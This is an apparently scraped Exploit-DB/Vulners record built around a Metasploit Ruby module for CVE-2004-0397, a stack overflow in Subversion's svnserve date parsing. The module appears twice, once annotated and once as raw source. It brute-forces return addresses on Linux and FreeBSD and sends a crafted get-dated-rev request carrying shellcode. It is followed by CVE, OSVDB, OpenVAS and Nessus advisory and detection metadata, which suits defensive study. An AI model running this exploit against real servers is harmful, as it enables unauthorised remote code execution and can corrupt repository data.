ID EDB-ID:16284 Type exploitdb Reporter metasploit Modified 2010-08-07T00:00:00
Description
Subversion Date Svnserve. CVE-2004-0397. DoS exploit for the unix platform
##
# $Id: svnserve_date.rb 9971 2010-08-07 06:59:16Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
require 'msf/core/exploit/http/client'
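class Metasploit3 < Msf::Exploit::Remote
  # Exploit module for CVE-2004-0397 (OSVDB 6301, BID 10386): the Subversion
  # date-parsing stack overflow. It speaks only the svnserve (svn://)
  # protocol; the WebDAV transport is out of scope for this module.
  # The vendor fix is Subversion 1.0.3 or later, which bounds the
  # sscanf()-based date conversion.
  Rank = AverageRanking

  include Msf::Exploit::Brute
  include Msf::Exploit::Remote::Tcp

  # Registers module metadata, targets and options with the framework.
  #
  # @param info [Hash] metadata supplied by the framework, merged via update_info
  def initialize(info = {})
    super(update_info(info,
      'Name'        => 'Subversion Date Svnserve',
      'Description' => %q{
        This is an exploit for the Subversion date parsing overflow. This
        exploit is for the svnserve daemon (svn:// protocol) and will not work
        for Subversion over webdav (http[s]://). This exploit should never
        crash the daemon, and should be safe to do multi-hits.

        **WARNING** This exploit seems to (not very often, I've only seen
        it during testing) corrupt the subversion database, so be careful!
      },
      'Author'      => 'spoonm',
      'Version'     => '$Revision: 9971 $',
      'References'  =>
        [
          ['CVE', '2004-0397'],
          ['OSVDB', '6301'],
          ['BID', '10386'],
          ['URL', 'http://lists.netsys.com/pipermail/full-disclosure/2004-May/021737.html'],
          ['MIL', '68'],
        ],
      'Payload'     =>
        {
          'Space'    => 500,
          # NUL, tab, LF, VT, FF, CR and space: whitespace the date parser
          # would treat as token separators.
          'BadChars' => "\x00\x09\x0a\x0b\x0c\x0d\x20",
          'MinNops'  => 16,
        },
      'SaveRegisters' => [ 'esp' ],
      'Arch'        => 'x86',
      'Platform'    => [ 'linux', 'bsd' ],
      # Each target walks 'Ret' from 'Start' down to 'Stop'; 'Step' => 0
      # leaves the stride to the Brute mixin's default.
      'Targets'     =>
        [
          [
            'Linux Bruteforce',
            {
              'Platform'   => 'linux',
              'Bruteforce' =>
                {
                  'Start' => { 'Ret' => 0xbffffe13 },
                  'Stop'  => { 'Ret' => 0xbfff0000 },
                  'Step'  => 0
                }
            },
          ],
          [
            'FreeBSD Bruteforce',
            {
              'Platform'   => 'bsd',
              'Bruteforce' =>
                {
                  'Start' => { 'Ret' => 0xbfbffe13 },
                  'Stop'  => { 'Ret' => 0xbfbf0000 },
                  'Step'  => 0
                }
            },
          ],
        ],
      'DisclosureDate' => 'May 19 2004'))

    register_options(
      [
        Opt::RPORT(3690),
        OptString.new('URL', [ true, "SVN URL (ie svn://host/repos)", "svn://host/svn/repos" ])
      ], self.class)

    register_advanced_options(
      [
        # 62 on spoonm's, 88 on HD's
        OptInt.new('RetLength', [ false, "Length of rets after payload", 100 ]),
        OptBool.new('IgnoreErrors', [ false, "Ignore errors", false ])
      ], self.class)
  end

  # This module has no passive vulnerability check. Returning an explicit
  # CheckCode gives the framework a well-formed result instead of the nil an
  # empty method body would return.
  #
  # @return [Array] Exploit::CheckCode::Unsupported
  def check
    Exploit::CheckCode::Unsupported
  end

  # Performs one brute-force attempt: the svn handshake followed by a single
  # get-dated-rev request whose date argument carries the overflow.
  #
  # The Brute mixin invokes this once per candidate 'Ret' value between the
  # target's 'Start' and 'Stop' addresses.
  #
  # @param addresses [Hash] candidate addresses for this attempt; only
  #   addresses['Ret'] is read
  # @raise [ExploitError] when a send fails and IgnoreErrors is false
  def brute_exploit(addresses)
    connect

    print_status("Trying #{"%.8x" % addresses['Ret']}...")

    # Little-endian copies of the return address (RetLength rounded down to a
    # multiple of four bytes) followed by the encoded payload.
    buffer = ([addresses['Ret']].pack('V') * (datastore['RetLength'] / 4).to_i) + payload.encoded

    requests = [
      "( 2 ( edit-pipeline ) " + lengther(datastore['URL']) + " ) ",
      "( ANONYMOUS ( 0; ) )",
      "( get-dated-rev ( " + lengther(buffer + " 3 Oct 2000 01:01:01.001 (day 277, dst 1, gmt_off)") + " ) ) "
    ]

    requests.each_with_index do |buf, index|
      # Read one chunk of whatever the server has sent so far (presumably
      # its greeting on the first pass, the reply to the previous request
      # afterwards) before sending the next request.
      trash = sock.get_once

      print_line("Received: #{trash}") if debugging?

      if (sock.put(buf) || 0) == 0 && index < 3
        print_error("Error transmitting buffer.")
        raise ExploitError, "Failed to transmit data" unless datastore['IgnoreErrors']
      end

      # NOTE(review): only three requests are sent (indices 0..2), so this
      # branch is unreachable as written; it looks like a leftover from a
      # version with a fourth request. Left in place so the module's
      # behaviour is unchanged.
      if index == 3 && trash.length > 0
        print_error("Received data when we shouldn't have")
        raise ExploitError, "Received data when it wasn't expected" unless datastore['IgnoreErrors']
      end
    end

    handler
    disconnect
  end

  # Encodes +buf+ as an svn-protocol string token, "<length>:<bytes>".
  #
  # @param buf [String] the raw string to encode
  # @return [String] +buf+ prefixed with its String#length and a colon
  def lengther(buf)
    "#{buf.length}:" + buf
  end

end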
{"id": "EDB-ID:16284", "type": "exploitdb", "bulletinFamily": "exploit", "title": "Subversion Date Svnserve", "description": "Subversion Date Svnserve. CVE-2004-0397. Dos exploit for unix platform", "published": "2010-08-07T00:00:00", "modified": "2010-08-07T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://www.exploit-db.com/exploits/16284/", "reporter": "metasploit", "references": [], "cvelist": ["CVE-2004-0397"], "lastseen": "2016-02-01T23:30:03", "viewCount": 5, "enchantments": {"score": {"value": 6.7, "vector": "NONE", "modified": "2016-02-01T23:30:03", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2004-0397"]}, {"type": "gentoo", "idList": ["GLSA-200405-14"]}, {"type": "openvas", "idList": ["OPENVAS:52460", "OPENVAS:54574"]}, {"type": "canvas", "idList": ["SVNDATE"]}, {"type": "nessus", "idList": ["FEDORA_2004-128.NASL", "FREEBSD_PKG_5D36EF32A9CF11D89C6D0020ED76EF5A.NASL", "SUBVERSION_1_0_4.NASL", "GENTOO_GLSA-200405-14.NASL", "FEDORA_2004-127.NASL", "FREEBSD_SUBVERSION_102_1.NASL"]}, {"type": "osvdb", "idList": ["OSVDB:6301"]}, {"type": "freebsd", "idList": ["5D36EF32-A9CF-11D8-9C6D-0020ED76EF5A"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/MULTI/SVN/SVNSERVE_DATE"]}, {"type": "exploitdb", "idList": ["EDB-ID:9935", "EDB-ID:304"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:82288"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:6239"]}, {"type": "suse", "idList": ["SUSE-SA:2004:013"]}], "modified": "2016-02-01T23:30:03", "rev": 2}, "vulnersScore": 6.7}, "sourceHref": "https://www.exploit-db.com/download/16284/", "sourceData": "##\r\n# $Id: svnserve_date.rb 9971 2010-08-07 06:59:16Z jduck $\r\n##\r\n\r\n##\r\n# This file is part of the Metasploit Framework and may be subject to\r\n# redistribution and commercial restrictions. 
Please see the Metasploit\r\n# Framework web site for more information on licensing and terms of use.\r\n# http://metasploit.com/framework/\r\n##\r\n\r\nrequire 'msf/core'\r\nrequire 'msf/core/exploit/http/client'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n\tRank = AverageRanking\r\n\r\n\tinclude Msf::Exploit::Brute\r\n\tinclude Msf::Exploit::Remote::Tcp\r\n\r\n\tdef initialize(info = {})\r\n\t\tsuper(update_info(info,\r\n\t\t\t'Name' => 'Subversion Date Svnserve',\r\n\t\t\t'Description' => %q{\r\n\t\t\t\t\tThis is an exploit for the Subversion date parsing overflow. This\r\n\t\t\t\texploit is for the svnserve daemon (svn:// protocol) and will not work\r\n\t\t\t\tfor Subversion over webdav (http[s]://). This exploit should never\r\n\t\t\t\tcrash the daemon, and should be safe to do multi-hits.\r\n\r\n\t\t\t\t**WARNING** This exploit seems to (not very often, I've only seen\r\n\t\t\t\tit during testing) corrupt the subversion database, so be careful!\r\n\t\t\t},\r\n\t\t\t'Author' => 'spoonm',\r\n\t\t\t'Version' => '$Revision: 9971 $',\r\n\t\t\t'References' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t['CVE', '2004-0397'],\r\n\t\t\t\t\t['OSVDB', '6301'],\r\n\t\t\t\t\t['BID',\t'10386'],\r\n\t\t\t\t\t['URL', 'http://lists.netsys.com/pipermail/full-disclosure/2004-May/021737.html'],\r\n\t\t\t\t\t['MIL', '68'],\r\n\t\t\t\t],\r\n\t\t\t'Payload' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'Space' => 500,\r\n\t\t\t\t\t'BadChars' => \"\\x00\\x09\\x0a\\x0b\\x0c\\x0d\\x20\",\r\n\t\t\t\t\t'MinNops' => 16,\r\n\t\t\t\t},\r\n\t\t\t'SaveRegisters' => [ 'esp' ],\r\n\t\t\t'Arch' => 'x86',\r\n\t\t\t'Platform' => [ 'linux', 'bsd' ],\r\n\t\t\t'Targets' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t[\r\n\t\t\t\t\t\t'Linux Bruteforce',\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t'Platform' => 'linux',\r\n\t\t\t\t\t\t\t'Bruteforce' =>\r\n\t\t\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t\t\t'Start' => { 'Ret' => 0xbffffe13 },\r\n\t\t\t\t\t\t\t\t\t'Stop' => { 'Ret' => 0xbfff0000 },\r\n\t\t\t\t\t\t\t\t\t'Step' => 
0\r\n\t\t\t\t\t\t\t\t}\r\n\t\t\t\t\t\t},\r\n\t\t\t\t\t],\r\n\t\t\t\t\t[\r\n\t\t\t\t\t\t'FreeBSD Bruteforce',\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t'Platform' => 'bsd',\r\n\t\t\t\t\t\t\t'Bruteforce' =>\r\n\t\t\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t\t\t'Start' => { 'Ret' => 0xbfbffe13 },\r\n\t\t\t\t\t\t\t\t\t'Stop' => { 'Ret' => 0xbfbf0000 },\r\n\t\t\t\t\t\t\t\t\t'Step' => 0\r\n\t\t\t\t\t\t\t\t}\r\n\t\t\t\t\t\t},\r\n\t\t\t\t\t],\r\n\r\n\t\t\t\t],\r\n\t\t\t'DisclosureDate' => 'May 19 2004'))\r\n\r\n\t\tregister_options(\r\n\t\t\t[\r\n\t\t\t\tOpt::RPORT(3690),\r\n\t\t\t\tOptString.new('URL', [ true, \"SVN URL (ie svn://host/repos)\", \"svn://host/svn/repos\" ])\r\n\t\t\t], self.class)\r\n\r\n\t\tregister_advanced_options(\r\n\t\t\t[\r\n\t\t\t\t# 62 on spoonm's, 88 on HD's\r\n\t\t\t\tOptInt.new('RetLength', [ false, \"Length of rets after payload\", 100 ]),\r\n\t\t\t\tOptBool.new('IgnoreErrors', [ false, \"Ignore errors\", false ])\r\n\t\t\t], self.class)\r\n\tend\r\n\r\n\tdef check\r\n\tend\r\n\r\n\tdef brute_exploit(addresses)\r\n\t\tconnect\r\n\r\n\t\tprint_status(\"Trying #{\"%.8x\" % addresses['Ret']}...\")\r\n\r\n\t\tbuffer = ([addresses['Ret']].pack('V') * (datastore['RetLength'] / 4).to_i) + payload.encoded\r\n\r\n\t\t[\r\n\t\t\t\"( 2 ( edit-pipeline ) \" + lengther(datastore['URL']) + \" ) \",\r\n\t\t\t\"( ANONYMOUS ( 0; ) )\",\r\n\t\t\t\"( get-dated-rev ( \" + lengther(buffer + \" 3 Oct 2000 01:01:01.001 (day 277, dst 1, gmt_off)\") + \" ) ) \"\r\n\t\t].each_with_index { |buf, index|\r\n\t\t\ttrash = sock.get_once\r\n\r\n\t\t\tprint_line(\"Received: #{trash}\") if debugging?\r\n\r\n\t\t\tif (sock.put(buf) || 0) == 0 and index < 3\r\n\t\t\t\tprint_error(\"Error transmitting buffer.\")\r\n\t\t\t\traise ExploitError, \"Failed to transmit data\" if !datastore['IgnoreErrors']\r\n\t\t\tend\r\n\r\n\t\t\tif index == 3 and trash.length > 0\r\n\t\t\t\tprint_error(\"Received data when we shouldn't have\")\r\n\t\t\t\traise ExploitError, \"Received data when it wasn't expected\" if 
!datastore['IgnoreErrors']\r\n\t\t\tend\r\n\t\t}\r\n\r\n\t\thandler\r\n\t\tdisconnect\r\n\tend\r\n\r\n\tdef lengther(buf)\r\n\t\t\"#{buf.length}:\" + buf\r\n\tend\r\n\r\nend\r\n", "osvdbidlist": ["6301"]}
{"cve": [{"lastseen": "2020-10-03T11:33:38", "description": "Stack-based buffer overflow during the apr_time_t data conversion in Subversion 1.0.2 and earlier allows remote attackers to execute arbitrary code via a (1) DAV2 REPORT query or (2) get-dated-rev svn-protocol command.", "edition": 3, "cvss3": {}, "published": "2004-07-07T04:00:00", "title": "CVE-2004-0397", "type": "cve", "cwe": ["NVD-CWE-Other"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": true, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2004-0397"], "modified": "2017-07-11T01:30:00", "cpe": ["cpe:/a:subversion:subversion:1.0", "cpe:/a:subversion:subversion:1.0.2", "cpe:/a:subversion:subversion:1.0.1"], "id": "CVE-2004-0397", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2004-0397", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:subversion:subversion:1.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:subversion:subversion:1.0:*:*:*:*:*:*:*", "cpe:2.3:a:subversion:subversion:1.0.1:*:*:*:*:*:*:*"]}], "packetstorm": [{"lastseen": "2016-12-05T22:13:57", "description": "", "published": "2009-10-28T00:00:00", "type": "packetstorm", "title": "Subversion Date Overflow", "bulletinFamily": "exploit", "cvelist": ["CVE-2004-0397"], "modified": "2009-10-28T00:00:00", "id": "PACKETSTORM:82288", "href": "https://packetstormsecurity.com/files/82288/Subversion-Date-Overflow.html", "sourceData": "`## \n# $Id$ \n## \n \n## \n# This file is part of the Metasploit Framework and may be subject to \n# redistribution and commercial restrictions. 
Please see the Metasploit \n# Framework web site for more information on licensing and terms of use. \n# http://metasploit.com/framework/ \n## \n \n \nrequire 'msf/core' \nrequire 'msf/core/exploit/http' \n \n \nclass Metasploit3 < Msf::Exploit::Remote \n \ninclude Msf::Exploit::Brute \ninclude Msf::Exploit::Remote::Tcp \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'Subversion Date Svnserve', \n'Description' => %q{ \nThis is an exploit for the Subversion date parsing overflow. This \nexploit is for the svnserve daemon (svn:// protocol) and will not work \nfor Subversion over webdav (http[s]://). This exploit should never \ncrash the daemon, and should be safe to do multi-hits. \n \n**WARNING** This exploit seems to (not very often, I've only seen \nit during testing) corrupt the subversion database, so be careful! \n}, \n'Author' => 'spoonm', \n'Version' => '$Revision$', \n'References' => \n[ \n['CVE', '2004-0397'], \n['OSVDB', '6301'], \n['BID', '10386'], \n['URL', 'http://lists.netsys.com/pipermail/full-disclosure/2004-May/021737.html'], \n['MIL', '68'], \n], \n'Payload' => \n{ \n'Space' => 500, \n'BadChars' => \"\\x00\\x09\\x0a\\x0b\\x0c\\x0d\\x20\", \n'MinNops' => 16, \n}, \n'SaveRegisters' => [ 'esp' ], \n'Arch' => 'x86', \n'Platform' => [ 'linux', 'bsd' ], \n'Targets' => \n[ \n[ \n'Linux Bruteforce', \n{ \n'Platform' => 'linux', \n'Bruteforce' => \n{ \n'Start' => { 'Ret' => 0xbffffe13 }, \n'Stop' => { 'Ret' => 0xbfff0000 }, \n'Step' => 0 \n} \n}, \n], \n[ \n'FreeBSD Bruteforce', \n{ \n'Platform' => 'bsd', \n'Bruteforce' => \n{ \n'Start' => { 'Ret' => 0xbfbffe13 }, \n'Stop' => { 'Ret' => 0xbfbf0000 }, \n'Step' => 0 \n} \n}, \n], \n \n], \n'DisclosureDate' => 'May 19 2004')) \n \nregister_options( \n[ \nOpt::RPORT(3690), \nOptString.new('URL', [ true, \"SVN URL (ie svn://host/repos)\", \"svn://host/svn/repos\" ]) \n], self.class) \n \nregister_advanced_options( \n[ \n# 62 on spoonm's, 88 on HD's \nOptInt.new('RetLength', [ false, \"Length 
of rets after payload\", 100 ]), \nOptBool.new('IgnoreErrors', [ false, \"Ignore errors\", false ]) \n], self.class) \nend \n \ndef check \nend \n \ndef brute_exploit(addresses) \nconnect \n \nprint_status(\"Trying #{\"%.8x\" % addresses['Ret']}...\") \n \nbuffer = ([addresses['Ret']].pack('V') * (datastore['RetLength'] / 4).to_i) + payload.encoded \n \n[ \n\"( 2 ( edit-pipeline ) \" + lengther(datastore['URL']) + \" ) \", \n\"( ANONYMOUS ( 0; ) )\", \n\"( get-dated-rev ( \" + lengther(buffer + \" 3 Oct 2000 01:01:01.001 (day 277, dst 1, gmt_off)\") + \" ) ) \" \n].each_with_index { |buf, index| \ntrash = sock.get_once \n \nprint_line(\"Received: #{trash}\") if debugging? \n \nif (sock.put(buf) || 0) == 0 and index < 3 \nprint_error(\"Error transmitting buffer.\") \nraise ExploitError, \"Failed to transmit data\" if !datastore['IgnoreErrors'] \nend \n \nif index == 3 and trash.length > 0 \nprint_error(\"Received data when we shouldn't have\") \nraise ExploitError, \"Received data when it wasn't expected\" if !datastore['IgnoreErrors'] \nend \n} \n \nhandler \ndisconnect \nend \n \ndef lengther(buf) \n\"#{buf.length}:\" + buf \nend \n \nend \n \n`\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://packetstormsecurity.com/files/download/82288/svnserve_date.rb.txt"}], "osvdb": [{"lastseen": "2017-04-28T13:20:01", "bulletinFamily": "software", "cvelist": ["CVE-2004-0397"], "edition": 1, "description": "## Vulnerability Description\nA remote overflow exists in Subversion. The Subversion fails to check the boundary when calling sscanf() to decode old-styled date strings. By sending a specially crafted request via a DAV2 REPORT query or get-dated-rev svn-protocol command, a remote attacker can cause a buffer overflow and execute arbitrary code, resulting in a loss of integrity.\n## Solution Description\nUpgrade to version 1.0.3 or higher, as it has been reported to fix this vulnerability. 
An upgrade is required as there are no known workarounds.\n## Short Description\nA remote overflow exists in Subversion. The Subversion fails to check the boundary when calling sscanf() to decode old-styled date strings. By sending a specially crafted request via a DAV2 REPORT query or get-dated-rev svn-protocol command, a remote attacker can cause a buffer overflow and execute arbitrary code, resulting in a loss of integrity.\n## References:\nVendor URL: http://subversion.tigris.org/\n[Vendor Specific Advisory URL](http://subversion.tigris.org/svn-sscanf-advisory.txt)\n[Secunia Advisory ID:11642](https://secuniaresearch.flexerasoftware.com/advisories/11642/)\n[Secunia Advisory ID:11675](https://secuniaresearch.flexerasoftware.com/advisories/11675/)\n[Secunia Advisory ID:11659](https://secuniaresearch.flexerasoftware.com/advisories/11659/)\nOther Advisory URL: http://www.gentoo.org/security/en/glsa/glsa-200405-14.xml\n[Nessus Plugin ID:13703](https://vulners.com/search?query=pluginID:13703)\n[Nessus Plugin ID:13702](https://vulners.com/search?query=pluginID:13702)\n[Nessus Plugin ID:12618](https://vulners.com/search?query=pluginID:12618)\nGeneric Informational URL: http://security.e-matters.de/advisories/082004.html\n[CVE-2004-0397](https://vulners.com/cve/CVE-2004-0397)\n", "modified": "2004-05-19T00:00:00", "published": "2004-05-19T00:00:00", "href": "https://vulners.com/osvdb/OSVDB:6301", "id": "OSVDB:6301", "type": "osvdb", "title": "Subversion (SVN) apr_time_t data Conversion Remote Overflow", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "openvas": [{"lastseen": "2017-07-24T12:50:14", "bulletinFamily": "scanner", "cvelist": ["CVE-2004-0397"], "description": "The remote host is missing updates announced in\nadvisory GLSA 200405-14.", "modified": "2017-07-07T00:00:00", "published": "2008-09-24T00:00:00", "id": "OPENVAS:54574", "href": "http://plugins.openvas.org/nasl.php?oid=54574", "type": "openvas", "title": 
"Gentoo Security Advisory GLSA 200405-14 (subversion)", "sourceData": "# OpenVAS Vulnerability Test\n# $\n# Description: Auto generated from Gentoo's XML based advisory\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2008 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisories, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"There is a vulnerability in the Subversion date parsing code which may lead\nto denial of service attacks, or execution of arbitrary code. 
Both the\nclient and server are vulnerable.\";\ntag_solution = \"All Subversion users should upgrade to the latest stable version:\n\n # emerge sync\n\n # emerge -pv '>=dev-util/subversion-1.0.3'\n # emerge '>=dev-util/subversion-1.0.3'\n\nhttp://www.securityspace.com/smysecure/catid.html?in=GLSA%20200405-14\nhttp://bugs.gentoo.org/show_bug.cgi?id=51462\nhttp://subversion.tigris.org/servlets/ReadMsg?list=announce&msgNo=125\nhttp://security.e-matters.de/advisories/082004.html\";\ntag_summary = \"The remote host is missing updates announced in\nadvisory GLSA 200405-14.\";\n\n \n\nif(description)\n{\n script_id(54574);\n script_cve_id(\"CVE-2004-0397\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_version(\"$Revision: 6596 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-07 11:21:37 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2008-09-24 21:14:03 +0200 (Wed, 24 Sep 2008)\");\n script_name(\"Gentoo Security Advisory GLSA 200405-14 (subversion)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2005 E-Soft Inc. 
http://www.securityspace.com\");\n script_family(\"Gentoo Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/gentoo\", \"ssh/login/pkg\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-gentoo.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = ispkgvuln(pkg:\"dev-util/subversion\", unaffected: make_list(\"ge 1.0.3\"), vulnerable: make_list(\"le 1.0.2\"))) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-07-02T21:10:27", "bulletinFamily": "scanner", "cvelist": ["CVE-2004-0397"], "description": "The remote host is missing an update to the system\nas announced in the referenced advisory.", "modified": "2016-09-30T00:00:00", "published": "2008-09-04T00:00:00", "id": "OPENVAS:52460", "href": "http://plugins.openvas.org/nasl.php?oid=52460", "type": "openvas", "title": "FreeBSD Ports: subversion", "sourceData": "#\n#VID 5d36ef32-a9cf-11d8-9c6d-0020ed76ef5a\n# OpenVAS Vulnerability Test\n# $\n# Description: Auto generated from vuxml or freebsd advisories\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2008 E-Soft Inc. 
http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisories, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"The following package is affected: subversion\n\nCVE-2004-0397\nStack-based buffer overflow during the apr_time_t data conversion in\nSubversion 1.0.2 and earlier allows remote attackers to execute\narbitrary code via a (1) DAV2 REPORT query or (2) get-dated-rev\nsvn-protocol command.\";\ntag_solution = \"Update your system with the appropriate patches or\nsoftware upgrades.\n\nhttp://security.e-matters.de/advisories/082004.html\nhttp://www.vuxml.org/freebsd/5d36ef32-a9cf-11d8-9c6d-0020ed76ef5a.html\";\ntag_summary = \"The remote host is missing an update to the system\nas announced in the referenced advisory.\";\n\n\nif(description)\n{\n script_id(52460);\n script_version(\"$Revision: 4188 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2016-09-30 07:56:47 +0200 (Fri, 30 Sep 2016) $\");\n script_tag(name:\"creation_date\", value:\"2008-09-04 20:41:11 +0200 (Thu, 04 Sep 2008)\");\n script_bugtraq_id(10386);\n script_cve_id(\"CVE-2004-0397\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_name(\"FreeBSD Ports: 
subversion\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2005 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"FreeBSD Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/freebsdrel\", \"login/SSH/success\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-bsd.inc\");\n\ntxt = \"\";\nvuln = 0;\nbver = portver(pkg:\"subversion\");\nif(!isnull(bver) && revcomp(a:bver, b:\"1.0.2_1\")<0) {\n txt += 'Package subversion version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\n\nif(vuln) {\n security_message(data:string(txt));\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "nessus": [{"lastseen": "2016-09-26T17:25:37", "description": "The following package needs to be updated: subversion", "edition": 1, "published": "2004-07-06T00:00:00", "type": "nessus", "title": "FreeBSD : subversion date parsing vulnerability (187)", "bulletinFamily": "scanner", "cvelist": ["CVE-2004-0397"], "modified": "2011-10-03T00:00:00", "id": "FREEBSD_SUBVERSION_102_1.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=12618", "sourceData": "# @DEPRECATED@\n#\n# This script has been deprecated by freebsd_pkg_5d36ef32a9cf11d89c6d0020ed76ef5a.nasl.\n#\n# Disabled on 2011/10/02.\n#\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# This script contains information extracted from VuXML :\n#\n# Copyright 2003-2006 Jacques Vidrine and contributors\n#\n# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,\n# 
HTML, PDF, PostScript, RTF and so forth) with or without modification,\n# are permitted provided that the following conditions are met:\n# 1. Redistributions of source code (VuXML) must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. Redistributions in compiled form (transformed to other DTDs,\n# published online in any format, converted to PDF, PostScript,\n# RTF and other formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n#\n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# 